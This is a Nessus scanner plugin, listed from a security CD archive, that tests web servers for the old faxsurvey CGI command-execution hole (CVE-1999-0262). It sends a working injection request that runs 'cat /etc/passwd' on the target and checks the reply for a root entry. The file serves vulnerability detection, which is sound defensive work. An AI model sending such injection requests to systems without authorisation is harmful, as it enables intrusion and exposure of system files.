home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / faxsurvey.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  75 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10067);
  10.  script_bugtraq_id(2056);
  11.  script_version ("$Revision: 1.28 $");
  12.  script_cve_id("CVE-1999-0262");
  13.  name["english"] = "Faxsurvey";
  14.  name["francais"] = "Faxsurvey";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "The 'faxsurvey' CGI allows a malicious user
  18. to view any file on the target computer, as well as execute
  19. arbitrary commands. 
  20.  
  21. Solution : Upgrade to a newer version
  22. Risk factor : High
  23. ";
  24.  
  25.  desc["francais"] = "Le CGI 'faxsurvey' permet α un 
  26. pirate de lire n'importe quel fichier sur la machine cible,
  27. ainsi que d'executer des commandes arbitraires.
  28.  
  29. Facteur de risque : ElevΘ.
  30.  
  31. Solution : Mettez α jour ce CGI";
  32.  
  33.  script_description(english:desc["english"], francais:desc["francais"]);
  34.  
  35.  summary["english"] = "Checks if faxsurvey is vulnerable";
  36.  summary["francais"] = "DΘtermine si faxsurvey est vulnΘrable";
  37.  
  38.  script_summary(english:summary["english"], francais:summary["francais"]);
  39.  
  40.  script_category(ACT_GATHER_INFO);
  41.  
  42.  
  43.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  44.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  45.  family["english"] = "CGI abuses";
  46.  family["francais"] = "Abus de CGI";
  47.  script_family(english:family["english"], francais:family["francais"]);
  48.  script_dependencie("find_service.nes", "no404.nasl");
  49.  script_require_ports("Services/www", 80);
  50.  exit(0);
  51. }
  52.  
  53. #
  54. # The script code starts here
  55. #
  56.  
  57. include("http_func.inc");
  58. include("http_keepalive.inc");
  59.  
  60. port = get_http_port(default:80);
  61.  
  62. if(!get_port_state(port))exit(0);
  63.  
  64. foreach dir (cgi_dirs())
  65. {
  66.  req = string(dir, "/faxsurvey?cat%20/etc/passwd");
  67.  req = http_get(item:req, port:port);
  68.  result = http_keepalive_send_recv(port:port, data:req);
  69.  if( result == NULL ) exit(0);
  70.  if(egrep(pattern:".*root:.*:0:[01]:.*", string:result)){
  71.      security_hole(port);
  72.     exit(0);
  73.     }
  74. }
  75.